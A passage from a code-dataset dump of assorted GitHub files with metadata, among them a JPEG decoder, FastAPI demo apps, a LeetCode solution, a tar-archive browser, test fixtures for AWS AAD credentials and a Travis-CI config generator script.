open(\"major-scale.mid\", \"wb\") as output_file:\n MyMIDI.writeFile(output_file)\n \n \n#fs = FluidSynth()\n#fs.midi_to_audio('./major-scale.mid', 'again.mp3')\n#import IPython\n\n#IPython.display.Audio('./again.mp3')","repo_name":"jgab3103/Jamie-Gabriel","sub_path":"MusicNotebooks/.ipynb_checkpoints/ScoreProcessingFunctions-checkpoint.py","file_name":"ScoreProcessingFunctions-checkpoint.py","file_ext":"py","file_size_in_byte":10126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"37621987953","text":"from src.data.datagen import LoadData, DataGen\nfrom src.img2seq import Img2SeqModel\n\nfrom src.utils.lr_schedule import LRSchedule\nfrom src.utils.general import Config\nfrom src.evaluation.text import score_files\n\ndata = LoadData('./data/', 'images/', 'formulas.final.lst', 'formula_image_1to1.lst')\ntrain_set, val_set, test_set, vocab = data()\n\ntest_set = DataGen(test_set[0], test_set[1])\n#val_set = DataGen(val_set[0], val_set[1])\n\ndir_output = './results/large/'\n\nconfig_data = Config(dir_output + \"data.json\")\nconfig_vocab = Config(dir_output + \"vocab.json\")\nconfig_model = Config(dir_output + \"model.json\")\n\n#vocab = Vocab(config_vocab)\nmodel = Img2SeqModel(config_model, dir_output, vocab)\nmodel.build_pred()\nmodel.restore_session(dir_output + \"model.weights/\")\n\nconfig_eval = Config({\"dir_answers\": dir_output + \"formulas_test/\",\n \"batch_size\": 20})\n\nfiles, perplexity, alphas = model.write_prediction(config_eval, test_set)\nformula_ref, formula_hyp = files[0], files[1]\nprint(alphas[0][0])\n\n# score the ref and prediction files\nscores = score_files(formula_ref, formula_hyp)\nscores[\"perplexity\"] = perplexity\nmsg = \" - \".join([\"{} {:04.2f}\".format(k, v) for k, v in scores.items()])\nmodel.logger.info(\"- Test Txt: {}\".format(msg))\n\n\n","repo_name":"shengdie/img2tex","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29158174646","text":"# leetcode-43-字符串相乘.py\n# 题目描述\n# 提示帮助\n# 提交记录\n# 社区讨论\n# 阅读解答\n# 给定两个以字符串形式表示的非负整数 num1 和 num2,返回 num1 和 num2 的乘积,它们的乘积也表示为字符串形式。\n\n# 示例 1:\n\n# 输入: num1 = \"2\", num2 = \"3\"\n# 输出: \"6\"\n# 示例 2:\n\n# 输入: num1 = \"123\", num2 = \"456\"\n# 输出: \"56088\"\n# 说明:\n\n# num1 和 num2 的长度小于110。\n# num1 和 num2 只包含数字 0-9。\n# num1 和 num2 均不以零开头,除非是数字 0 本身。\n# 不能使用任何标准库的大数类型(比如 BigInteger)或直接将输入转换为整数来处理\n\n\nclass Solution:\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n # 参考 \n num1,num2 = num1[::-1],num2[::-1]\n result = [0]*(len(num1)+len(num2))\n\n for i in range(len(num1)):\n int1 = ord(num1[i])-ord('0')\n\n for j in range(len(num2)):\n int2 = ord(num2[j])-ord('0')\n\n tens,units = divmod(int1*int2,10)\n\n result[i+j] += units\n\n if result[i+j]>9:\n result[i+j+1] += result[i+j]//10\n result[i+j]%=10\n\n result[i+j+1] += tens\n if result[i+j+1]>9:\n result[i+j+2] += result[i+j+1]//10\n result[i+j+1] %= 10\n\n while len(result) > 1 and result[-1] ==0:\n result.pop()\n\n return \"\".join(map(str,result[::-1]))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n # num1 = list(map(int,[c for c in reversed(num1)]))\n # num2 = list(map(int,[c for c in reversed(num2)]))\n\n # ans = []\n # up = 0\n # for c1,c2 in itertools.zip_longest(num1,num2,fillvalue=0):\n # tmp = c1*c2+up\n # up = 0\n\n # if tmp>9:\n # up=tmp/10\n # tmp=tmp%10\n\n # ans.append(tmp)\n\n # if up:\n # 
ans.append(up)\n\n # return \"\".join(list(map(str,reversed(ans))))\n\n","repo_name":"ZX1209/gl-algorithm-practise","sub_path":"leetcode-gl-python/leetcode-43-字符串相乘.py","file_name":"leetcode-43-字符串相乘.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9386809147","text":"import io\nfrom tarfile import TarFile, TarInfo, DIRTYPE\nfrom archive import Archive\n\n\nclass TarArchive(Archive):\n def __init__(self, archive_name: str) -> None:\n super().__init__(self)\n self.archive_name = archive_name\n self.tar_archive = TarFile(archive_name, 'r')\n\n def ls(self) -> list[str]:\n messages: list[str] = []\n for tinfo in self.tar_archive.getmembers():\n if self.current_dir != '' and (not tinfo.name.startswith(self.current_dir) or tinfo.name == self.current_dir):\n continue\n messages.append(\"%20s %12d\" % (tinfo.name[len(\n self.current_dir) + 1 if self.current_dir != '' else 0:], tinfo.size))\n return messages\n\n def cd(self, directory_name: str) -> str | None:\n if directory_name == '/':\n self.current_dir = ''\n self.depth = 0\n elif directory_name == '..':\n self.current_dir = '/'.join(self.current_dir.split('/')[:-2])\n self.depth -= 1\n else:\n directories = [\n x.name for x in self.tar_archive.getmembers() if x.isdir()]\n if directory_name in directories:\n self.current_dir = directory_name if self.current_dir == '' else self.current_dir + \\\n '/' + directory_name\n self.depth = (self.current_dir != '') + \\\n self.current_dir.count('/')\n else:\n return f'{directory_name}: No such directory'\n\n def cat(self, file_name: str) -> str:\n file_name = file_name if self.current_dir == '' else self.current_dir + '/' + file_name\n if file_name in [x.name for x in self.tar_archive.getmembers() if not x.isdir()]:\n member = [x for x in self.tar_archive.getmembers()\n if x.name == file_name][0]\n f = io.TextIOWrapper(\n self.tar_archive.extractfile(member), encoding='utf-8')\n return f.readlines()\n else:\n return ['No such file: ' + file_name]\n\n def mkdir(self, directory_name: str) -> str:\n t = TarInfo(directory_name)\n t.type = DIRTYPE\n self.tar_archive.close()\n self.tar_archive = TarFile(self.archive_name, 'a')\n self.tar_archive.addfile(t)\n self.tar_archive.close()\n self.tar_archive = TarFile(self.archive_name, 'r')\n","repo_name":"descenty/scm-3-sem","sub_path":"projects/vshell/tar_archive.py","file_name":"tar_archive.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28255563901","text":"import argparse\nimport math\nimport numpy as np\nfrom scipy import fftpack\nfrom PIL import Image\n\ndef load_quantization_table(component):\n # Quantization Table for: Photoshop - (Save For Web 080)\n # (http://www.impulseadventure.com/photo/jpeg-quantization.html)\n if component == 'lum':\n q = np.array([[2, 2, 2, 2, 3, 4, 5, 6],\n [2, 2, 2, 2, 3, 4, 5, 6],\n [2, 2, 2, 2, 4, 5, 7, 9],\n [2, 2, 2, 4, 5, 7, 9, 12],\n [3, 3, 4, 5, 8, 10, 12, 12],\n [4, 4, 5, 7, 10, 12, 12, 12],\n [5, 5, 7, 9, 12, 12, 12, 12],\n [6, 6, 9, 12, 12, 12, 12, 12]])\n elif component == 'chrom':\n q = np.array([[3, 3, 5, 9, 13, 15, 15, 15],\n [3, 4, 6, 11, 14, 12, 12, 12],\n [5, 6, 9, 14, 12, 12, 12, 12],\n [9, 11, 14, 12, 12, 12, 12, 12],\n [13, 14, 12, 12, 12, 12, 12, 12],\n [15, 12, 12, 12, 12, 12, 12, 12],\n [15, 12, 12, 12, 12, 12, 12, 12],\n [15, 12, 12, 12, 12, 12, 12, 12]])\n else:\n raise ValueError((\n 
\"component should be either 'lum' or 'chrom', \"\n \"but '{comp}' was found\").format(comp=component))\n\n return q\n\n\ndef zigzag_points(rows, cols):\n # constants for directions\n UP, DOWN, RIGHT, LEFT, UP_RIGHT, DOWN_LEFT = range(6)\n\n # move the point in different directions\n def move(direction, point):\n return {\n UP: lambda point: (point[0] - 1, point[1]),\n DOWN: lambda point: (point[0] + 1, point[1]),\n LEFT: lambda point: (point[0], point[1] - 1),\n RIGHT: lambda point: (point[0], point[1] + 1),\n UP_RIGHT: lambda point: move(UP, move(RIGHT, point)),\n DOWN_LEFT: lambda point: move(DOWN, move(LEFT, point))\n }[direction](point)\n\n # return true if point is inside the block bounds\n def inbounds(point):\n return 0 <= point[0] < rows and 0 <= point[1] < cols\n\n # start in the top-left cell\n point = (0, 0)\n\n # True when moving up-right, False when moving down-left\n move_up = True\n\n for i in range(rows * cols):\n yield point\n if move_up:\n if inbounds(move(UP_RIGHT, point)):\n point = move(UP_RIGHT, point)\n else:\n move_up = False\n if inbounds(move(RIGHT, point)):\n point = move(RIGHT, point)\n else:\n point = move(DOWN, point)\n else:\n if inbounds(move(DOWN_LEFT, point)):\n point = move(DOWN_LEFT, point)\n else:\n move_up = True\n if inbounds(move(DOWN, point)):\n point = move(DOWN, point)\n else:\n point = move(RIGHT, point)\n\n\ndef bits_required(n):\n n = abs(n)\n result = 0\n while n > 0:\n n >>= 1\n result += 1\n return result\n\n\ndef binstr_flip(binstr):\n # check if binstr is a binary string\n if not set(binstr).issubset('01'):\n raise ValueError(\"binstr should have only '0's and '1's\")\n return ''.join(map(lambda c: '0' if c == '1' else '1', binstr))\n\n\ndef uint_to_binstr(number, size):\n return bin(number)[2:][-size:].zfill(size)\n\n\ndef int_to_binstr(n):\n if n == 0:\n return ''\n\n binstr = bin(abs(n))[2:]\n\n # change every 0 to 1 and vice verse when n is negative\n return binstr if n > 0 else binstr_flip(binstr)\n\n\ndef flatten(lst):\n return [item for sublist in lst for item in sublist]\n\n\nclass JPEGFileReader:\n TABLE_SIZE_BITS = 16\n BLOCKS_COUNT_BITS = 32\n\n DC_CODE_LENGTH_BITS = 4\n CATEGORY_BITS = 4\n\n AC_CODE_LENGTH_BITS = 8\n RUN_LENGTH_BITS = 4\n SIZE_BITS = 4\n\n def __init__(self, filepath):\n self.__file = open(filepath, 'r')\n\n def read_int(self, size):\n if size == 0:\n return 0\n\n # the most significant bit indicates the sign of the number\n bin_num = self.__read_str(size)\n if bin_num[0] == '1':\n return self.__int2(bin_num)\n else:\n return self.__int2(binstr_flip(bin_num)) * -1\n\n def read_dc_table(self):\n table = dict()\n\n table_size = self.__read_uint(self.TABLE_SIZE_BITS)\n for _ in range(table_size):\n category = self.__read_uint(self.CATEGORY_BITS)\n code_length = self.__read_uint(self.DC_CODE_LENGTH_BITS)\n code = self.__read_str(code_length)\n table[code] = category\n return table\n\n def read_ac_table(self):\n table = dict()\n\n table_size = self.__read_uint(self.TABLE_SIZE_BITS)\n for _ in range(table_size):\n run_length = self.__read_uint(self.RUN_LENGTH_BITS)\n size = self.__read_uint(self.SIZE_BITS)\n code_length = self.__read_uint(self.AC_CODE_LENGTH_BITS)\n code = self.__read_str(code_length)\n table[code] = (run_length, size)\n return table\n\n def read_blocks_count(self):\n return self.__read_uint(self.BLOCKS_COUNT_BITS)\n\n def read_huffman_code(self, table):\n prefix = ''\n # TODO: break the loop if __read_char is not returing new char\n while prefix not in table:\n prefix += self.__read_char()\n return 
table[prefix]\n\n def __read_uint(self, size):\n if size <= 0:\n raise ValueError(\"size of unsigned int should be greater than 0\")\n return self.__int2(self.__read_str(size))\n\n def __read_str(self, length):\n return self.__file.read(length)\n\n def __read_char(self):\n return self.__read_str(1)\n\n def __int2(self, bin_num):\n return int(bin_num, 2)\n\n\ndef read_image_file(filepath):\n reader = JPEGFileReader(filepath)\n\n tables = dict()\n for table_name in ['dc_y', 'ac_y', 'dc_c', 'ac_c']:\n if 'dc' in table_name:\n tables[table_name] = reader.read_dc_table()\n else:\n tables[table_name] = reader.read_ac_table()\n\n blocks_count = reader.read_blocks_count()\n\n dc = np.empty((blocks_count, 3), dtype=np.int32)\n ac = np.empty((blocks_count, 63, 3), dtype=np.int32)\n\n for block_index in range(blocks_count):\n for component in range(3):\n dc_table = tables['dc_y'] if component == 0 else tables['dc_c']\n ac_table = tables['ac_y'] if component == 0 else tables['ac_c']\n\n category = reader.read_huffman_code(dc_table)\n dc[block_index, component] = reader.read_int(category)\n\n cells_count = 0\n\n # TODO: try to make reading AC coefficients better\n while cells_count < 63:\n run_length, size = reader.read_huffman_code(ac_table)\n\n if (run_length, size) == (0, 0):\n while cells_count < 63:\n ac[block_index, cells_count, component] = 0\n cells_count += 1\n else:\n for i in range(run_length):\n ac[block_index, cells_count, component] = 0\n cells_count += 1\n if size == 0:\n ac[block_index, cells_count, component] = 0\n else:\n value = reader.read_int(size)\n ac[block_index, cells_count, component] = value\n cells_count += 1\n\n return dc, ac, tables, blocks_count\n\n\ndef zigzag_to_block(zigzag):\n # assuming that the width and the height of the block are equal\n rows = cols = int(math.sqrt(len(zigzag)))\n\n if rows * cols != len(zigzag):\n raise ValueError(\"length of zigzag should be a perfect square\")\n\n block = np.empty((rows, cols), np.int32)\n\n for i, point in enumerate(zigzag_points(rows, cols)):\n block[point] = zigzag[i]\n\n return block\n\n\ndef dequantize(block, component):\n q = load_quantization_table(component)\n return block * q\n\n\ndef idct_2d(image):\n return fftpack.idct(fftpack.idct(image.T, norm='ortho').T, norm='ortho')\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input\", help=\"path to the input image\")\n args = parser.parse_args()\n\n dc, ac, tables, blocks_count = read_image_file(args.input)\n\n # assuming that the block is a 8x8 square\n block_side = 8\n\n # assuming that the image height and width are equal\n image_side = int(math.sqrt(blocks_count)) * block_side\n\n blocks_per_line = image_side // block_side\n\n npmat = np.empty((image_side, image_side, 3), dtype=np.uint8)\n\n for block_index in range(blocks_count):\n i = block_index // blocks_per_line * block_side\n j = block_index % blocks_per_line * block_side\n\n for c in range(3):\n zigzag = [dc[block_index, c]] + list(ac[block_index, :, c])\n quant_matrix = zigzag_to_block(zigzag)\n dct_matrix = dequantize(quant_matrix, 'lum' if c == 0 else 'chrom')\n block = idct_2d(dct_matrix)\n npmat[i:i+8, j:j+8, c] = block + 128\n\n image = Image.fromarray(npmat, 'YCbCr')\n image = image.convert('RGB')\n image.show()\n\n\nif __name__ == \"__main__\":\n 
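# decode the coefficients back into an image and display it\n    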
main()","repo_name":"vjoshi12/dicom-viewer","sub_path":"dicomviewerapp/jdecode.py","file_name":"jdecode.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39023771265","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom app.core.config import settings\nfrom app.api.v1.api import api_router\n\napp = FastAPI(\n title=settings.PROJECT_NAME\n)\n\nif settings.BACKEND_CORS_ORIGINS:\n app.add_middleware(\n CORSMiddleware,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS]\n )\n\napp.include_router(api_router, prefix=\"/api/v1\", tags=[\"v1\"])\n\n@app.get(\"/\")\nasync def root():\n return 'Sometimes I dream about cheese.'","repo_name":"hitomi-team/sukima","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"18"} +{"seq_id":"7047022941","text":"\"\"\"______________________________________________\n| Programação II - 2º Ciclo Jogos Digitais |\n| Nome: Thiago Zacarias da Silva |\n| Programa : Comportamento Boo |\n| Data : 15/04/2018 |\n|________________________________________________|\n\"\"\"\n\nimport time\n\nboo = '¶'\nmapa = ['_'] * 20\nbooPos = len(mapa) - 2\nplayer = '>'\nplayerSide = 'esquerda'\n\nmapa[0] = player\nmapa[len(mapa) - 1] = boo\ndigitar = True\ncontrole = 0\n\nwhile True:\n if digitar and controle == 0:\n playerSide = input('\\nesquerda\\t|\\tdireita\\nPra qual lado deseja virar o jogador? ')\n controle = 3\n\n if playerSide == 'esquerda':\n player = '<'\n mapa[0] = player\n for i in range(len(mapa)):\n mapa[booPos] = boo\n mapa[booPos + 1] = '_'\n print(mapa[i], end='')\n\n else:\n player = '>'\n mapa[0] = player\n for i in range(len(mapa)):\n print(mapa[i], end='')\n controle = 1\n\n if playerSide == 'esquerda':\n booPos -= 1\n controle -= 1\n if booPos < 0:\n print('\\n\\nO jogador Morreu')\n break\n\n\n print('')\n time.sleep(.2)","repo_name":"thiagoaxll/Python","sub_path":"Exercícios/ComportamentoBoo.py","file_name":"ComportamentoBoo.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36206762915","text":"from itertools import *\nfrom collections import *\nfrom heapq import *\nfrom bisect import *\nfrom copy import *\nimport math\nimport sys\nsys.setrecursionlimit(1<<20)\nINF = float('inf')\nR,C,K = map(int,input().split())\nS = [input() for _ in range(R)]\nL = []\nfor i in range(R):\n tmp = []\n for j in range(C):\n if S[i][j]=='o':\n tmp.append(True)\n else:\n tmp.append(False)\n L.append(tmp)\n# print(L)\nfor _ in range(K-1):\n LL = [[False]*C for _ in range(R)]\n for i in range(R):\n for j in range(C):\n if 1<=i str:\n return 'string'\n\n\n@app.post('/post')\ndef post():\n return post_db[0]\n\n\n@app.get('/dog')\ndef get_dogs(kind: str = None):\n list_dogs = []\n if kind is None:\n return dogs_db\n for i in range(len(dogs_db)):\n if kind == dogs_db.get(i).kind:\n list_dogs.append(dogs_db.get(i))\n return list_dogs\n\n\n\n@app.post('/dog')\ndef create_dogs(dog: Dog) -> Dog:\n pk_ = len(dogs_db)\n for i in range(len(dogs_db)):\n if dog.pk == dogs_db.get(i).pk:\n dog.pk = pk_\n dogs_db[dog.pk] = dog\n return dog\n\n\n@app.get('/dog/{pk}')\ndef get_dog_pk(pk: int):\n for i in range(len(dogs_db)):\n if 
pk == dogs_db.get(i).pk:\n return dogs_db.get(i)\n return 'Dog does not exist'\n\n\n@app.patch('/dog/{pk}')\ndef update_dog(pk: int, dog: Dog):\n for i in range(len(dogs_db)):\n if pk == dogs_db.get(i).pk:\n dogs_db[dog.pk] = dog\n return dogs_db[dog.pk]\n return 'Dog does not exist'\n\n\n@app.get('/dog/{kind}')\ndef get_dog_pk(kind: str):\n for i in range(len(dogs_db)):\n if kind == dogs_db.get(i).kind:\n return dogs_db.get(i)\n return 'Dog does not exist'\n","repo_name":"NatashaMakhanova/fast_api_hw","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"44135241914","text":"# python3\n# circular_array.py - Array like data structure that allows for efficient rotations.\n\nimport time\n\n# Without using deque:\n\nclass Node:\n def __init__(self, key, prev=None, next=None):\n self.key = key\n self.prev = prev\n self.next = next\n\n def __str__(self):\n return str(self.key)\n\n\nclass CircularArray:\n \"\"\"\n Array like data structure that allows for efficient rotations.\n \"\"\"\n\n def __init__(self):\n self.head = None\n self.tail = None\n\n def add(self, key):\n \"\"\"\n Adds nodes to the end of the array\n \"\"\"\n if self.is_empty() == True:\n self.head = self.tail = Node(key)\n else:\n self.tail.next = Node(key, self.tail, None)\n self.tail = self.tail.next\n return self\n\n def is_empty(self):\n return self.head == None\n\n def popleft(self):\n if self.is_empty() == True:\n raise Exception(\"Popping from an empty array.\")\n elif self.head.next == None:\n node = self.head\n self.head = None\n self.tail = None\n else:\n node = self.head\n\n # Clear old node relationships and create new ones for next node\n new_head = self.head.next\n self.head = new_head\n self.head.next = new_head.next\n self.head.prev = None\n return node\n\n def rotate(self, num_rotations):\n if self.is_empty() == True:\n raise Exception(\"Rotating an empty array.\")\n else:\n for x in range(num_rotations):\n node = self.popleft()\n self.add(node.key)\n\n def __str__(self):\n values = [str(x) for x in self]\n return \" <--> \".join(values)\n\n def __iter__(self):\n current = self.head\n while current:\n yield current\n current = current.next\n\n\n\ndef example():\n circular_array = CircularArray()\n \n for x in range(1, 10):\n circular_array.add(x)\n circular_array.rotate(10)\n print(circular_array)\n\n circular_array.rotate(10)\n print(circular_array)\n circular_array.popleft()\n print(circular_array)\n\n for x in range(1, 9):\n circular_array.popleft()\n\n start = time.time()\n for x in range(1, 100):\n circular_array.add(x)\n start = time.time()\n circular_array.rotate(1000)\n end = time.time()\n difference = end - start \n print(f\"100 items: {round(difference, 16)} seconds\")\n for x in range(1, 100):\n circular_array.popleft()\n\n for x in range(1, 1000):\n circular_array.add(x)\n\n start = time.time()\n circular_array.rotate(1000)\n end = time.time()\n difference = end - start \n print(f\"10000 items: {round(difference, 16)} seconds\")\n\n for x in range(1, 1000):\n circular_array.popleft()\n\n \n for x in range(1, 100):\n circular_array.add(x)\n\n start = time.time()\n circular_array.rotate(10)\n end = time.time()\n difference = end - start \n print(f\"10 rotations: {round(difference, 16)} seconds\")\n\n start = time.time()\n circular_array.rotate(100)\n end = time.time()\n difference = end - start \n print(f\"100 rotations: {round(difference, 16)} seconds\")\n\n 
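# rotate(n) does n popleft()/add() pairs, each O(1), so the timings below are\n    # expected to grow roughly linearly with the number of rotations\n    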
start = time.time()\n circular_array.rotate(10000)\n end = time.time()\n difference = end - start \n print(f\"10000 rotations: {round(difference, 16)} seconds\")\n\n start = time.time()\n circular_array.rotate(1000000)\n end = time.time()\n difference = end - start \n print(f\"1000000 rotations: {round(difference, 16)} seconds\")\n\n \nif __name__ == \"__main__\":\n example()","repo_name":"GingerLee11/CCI_6ed","sub_path":"chapter_7/circular_array.py","file_name":"circular_array.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39718027887","text":"\r\nimport mock\r\n\r\nimport pytest\r\nimport requests\r\n\r\n\r\nfrom aws_aad_creds.aad import DeviceCodeAuthenticator\r\nfrom aws_aad_creds.aad import DeviceCodeCredentialsFetcher\r\n\r\n\r\n@pytest.fixture\r\ndef mock_requests_session():\r\n return mock.Mock(spec=requests.Session)\r\n\r\n\r\n@pytest.fixture\r\ndef aad_auth(prompter, mock_requests_session):\r\n return DeviceCodeAuthenticator(prompter, mock_requests_session)\r\n\r\n\r\n@pytest.fixture\r\ndef generic_config():\r\n return {\r\n 'role_arn': 'arn:aws:iam::123456789012:role/fakerole',\r\n 'cli_client_id': '11111111-1111-1111-1111-111111111111',\r\n 'aad_tenant': 'testtenant.obviouslyfake.mockdomain',\r\n 'middleware_client_id': '22222222-2222-2222-2222-222222222222',\r\n 'middleware_client_secret': 'notsosecret',\r\n 'middleware_url': None,\r\n 'authority_host_url': 'https://clearly.notmicrosoft.mockdomain'\r\n }\r\n\r\n\r\n@pytest.fixture\r\ndef middleware_url_config():\r\n return {\r\n 'role_arn': 'arn:aws:iam::123456789012:role/fakerole',\r\n 'cli_client_id': '11111111-1111-1111-1111-111111111111',\r\n 'aad_tenant': 'testtenant.obviouslyfake.mockdomain',\r\n 'middleware_client_id': None,\r\n 'middleware_client_secret': None,\r\n 'middleware_url': 'https://middleware.obviouslyfake.mockdomain',\r\n 'authority_host_url': 'https://clearly.notmicrosoft.mockdomain'\r\n }\r\n\r\n\r\n@pytest.fixture\r\ndef aad_fetcher(generic_config, client_creator, prompter, mock_authenticator,\r\n cache):\r\n authenticator_cls = mock.Mock(return_value=mock_authenticator)\r\n provider_name = 'myprovider'\r\n\r\n class MockDeviceCodeCredentialsFetcher(DeviceCodeCredentialsFetcher):\r\n _PROVIDERS = {\r\n provider_name: authenticator_cls\r\n }\r\n\r\n fetcher = MockDeviceCodeCredentialsFetcher(\r\n client_creator=client_creator,\r\n provider_name=provider_name,\r\n saml_config=generic_config,\r\n password_prompter=prompter,\r\n cache=cache\r\n )\r\n return fetcher\r\n\r\n\r\n@pytest.fixture\r\ndef mock_authenticator():\r\n return mock.Mock(spec=DeviceCodeAuthenticator)\r\n\r\n\r\n@pytest.fixture\r\ndef cache():\r\n return {}\r\n\r\n\r\nclass TestDeviceCodeAuthenticator(object):\r\n\r\n @pytest.mark.xfail(reason=\"TODO: Cover with tests\")\r\n def test_nothing_implemented_yet(self, aad_auth):\r\n assert aad_auth is None\r\n\r\n\r\nclass TestDeviceCodeCredentialsFetcher(object):\r\n\r\n @pytest.mark.xfail(reason=\"TODO: Cover with tests\")\r\n def test_nothing_implemented_yet(self, fetcher):\r\n assert fetcher is None\r\n","repo_name":"elliotsegler/aws-aad-creds","sub_path":"tests/unit/test_aad.py","file_name":"test_aad.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"75094576359","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport argparse\nimport subprocess\nimport datetime\n\n\ndef 
_log(prefix, color, message, color_full_line=True):\n if color_full_line:\n print(f'{color}{prefix}: {message}\\033[0m');\n else:\n print(f'{color}{prefix}:\\033[0m {message}');\n\ndef log_t(msg): _log('TRC', '\\033[90m', msg, color_full_line=True)\ndef log_d(msg): _log('DBG', '\\033[39m', msg)\ndef log_i(msg): _log('INF', '\\033[94m', msg)\ndef log_w(msg): _log('WRN', '\\033[33m', msg)\ndef log_e(msg): _log('ERR', '\\033[91m', msg)\n\n\n\ndef shell_exec(cmd, timeout_s=5, check_succ=True):\n cmd_copy = []\n quoter_parts = []\n quoter_type = '\"'\n for p in cmd.split():\n if quoter_parts:\n if not p.endswith(quoter_type):\n quoter_parts.append(p)\n else:\n quoter_parts.append(p[:-1])\n cmd_copy.append(' '.join(quoter_parts))\n quoter_parts.clear()\n else:\n if p.startswith('\"'):\n quoter_type = '\"'\n if p.endswith(quoter_type):\n cmd_copy.append(p)\n else:\n quoter_parts.append(p[1:])\n elif p.startswith(\"'\"):\n quoter_type = \"'\"\n if p.endswith(quoter_type):\n cmd_copy.append(p)\n else:\n quoter_parts.append(p[1:])\n else:\n cmd_copy.append(p)\n log_t('C>[{}]'.format(' '.join(cmd_copy)))\n res = subprocess.run(cmd_copy, capture_output=True, timeout=timeout_s)\n ec = res.returncode\n out = res.stdout.decode('utf-8').rstrip()\n if out and len(out.split('\\n')) > 1:\n log_t(f'R({ec})<\\n{out}')\n else:\n log_t(f'R({ec})<[{out}]')\n if check_succ:\n res.check_returncode()\n return out\n return ec, out\n\n\n\nclass Config:\n CTRL_PREFIXES = ['hw']\n GIT_ROOT = '.'\n GIT_INIT_COMMIT = 'd829c61855aff7241e12d8578d4a66a7118eb327'\n TRAVIS_CI_CFG_NAME = '.travis.yml'\n TRAVIS_CI_DIR = '.git/travis-ci'\n LAST_GREEN_COMMIT_FNAME = '.git/travis-ci/last_green_build_commit'\n STATE_FNAME = '.git/travis-ci/state'\n NEED_INIT = False\n SET_READY = False\n SAVE_COMMIT = None\n IS_CONTINUE = False\n\n @staticmethod\n def init_cfg():\n log_d('class @Config initialisation')\n Config.GIT_INIT_COMMIT = shell_exec('git rev-list --max-parents=0 HEAD')\n Config.GIT_ROOT = shell_exec('git rev-parse --show-toplevel').strip()\n Config.TRAVIS_CI_DIR = f'{Config.GIT_ROOT}/.git/travis-ci'\n Config.LAST_GREEN_COMMIT_FNAME = f'{Config.TRAVIS_CI_DIR}/last_green_build_commit'\n Config.STATE_FNAME = f'{Config.TRAVIS_CI_DIR}/state'\n\n @staticmethod\n def self_path(is_abs=False):\n rel_path = 'scripts/travis_yml_generator.py'\n return f'{Config.GIT_ROOT}/{rel_path}' if is_abs else rel_path\n\n @staticmethod\n def parse_args():\n parser = argparse.ArgumentParser(\n description='Generator of Tracis-CI configuration before pushing changes to GitHub')\n parser.add_argument('--init', action='store_true', help='Initialize repo for developer')\n parser.add_argument('--set_ready', action='store_true', help='Approve pushing changes')\n parser.add_argument('--set_commit', metavar='HASH', help='Set last \\033[92mGREEN\\033[0m commit')\n parser.add_argument('--exec_main', action='store_true', help='Execute main functionality')\n args = parser.parse_args()\n Config.NEED_INIT = args.init\n Config.SET_READY = args.set_ready\n Config.SAVE_COMMIT = args.set_commit\n Config.IS_CONTINUE = args.exec_main\n\n @staticmethod\n def set_state(state):\n assert type(state) == type(True)\n with open(Config.STATE_FNAME, 'w') as f:\n f.write('READY' if state else 'NOT READY')\n\n @staticmethod\n def get_state():\n if not os.path.isfile(Config.STATE_FNAME): return False\n state = ''\n with open(Config.STATE_FNAME, 'r') as f: state = f.readline().strip()\n if not state: return False\n return state == 'READY'\n\n @staticmethod\n def 
create_working_dir_if_needed():\n if not os.path.isdir(Config.TRAVIS_CI_DIR):\n os.mkdir(Config.TRAVIS_CI_DIR, mode=0o755)\n\n @staticmethod\n def set_commit(commit):\n with open(Config.LAST_GREEN_COMMIT_FNAME, 'w') as f:\n f.write(commit)\n\n\nclass Project:\n def __init__(self, dir_name):\n self.sep = '-'\n self.dir = dir_name\n self.build_dir = dir_name + '/build'\n sep_index = dir_name.index(self.sep)\n self.prefix = dir_name[0:sep_index]\n self.name = dir_name[sep_index+1:]\n def full_name(self):\n return '{}{}{}'.format(self.prefix, self.sep, self.name)\n def has_ut(self):\n cmake_cfg = self.dir + '/CMakeLists.txt'\n if not os.path.isfile(cmake_cfg): return False\n ec, _ = shell_exec(f\"grep -w enable_testing {cmake_cfg}\", check_succ=False)\n return 0 == ec\n # for set()\n def __hash__(self):\n return hash(self.dir)\n def __eq__(self, v):\n return self.dir == v.dir\n # for sorted()\n def __lt__(self, v):\n return self.dir < v.dir\n\n\ndef gen_warning():\n return \"\"\"# This is autogen file by tools/travis_yml_generator.py\n# Do not change it manualy because after a next `git push` command this file\n# will be regenerated.\n#\n\n\"\"\"\n\n\ndef last_green_travis_build():\n commit = ''\n if os.path.isfile(Config.LAST_GREEN_COMMIT_FNAME):\n with open(Config.LAST_GREEN_COMMIT_FNAME, 'r') as f: commit = f.readline()\n return commit if commit else Config.GIT_INIT_COMMIT\n\n\ndef 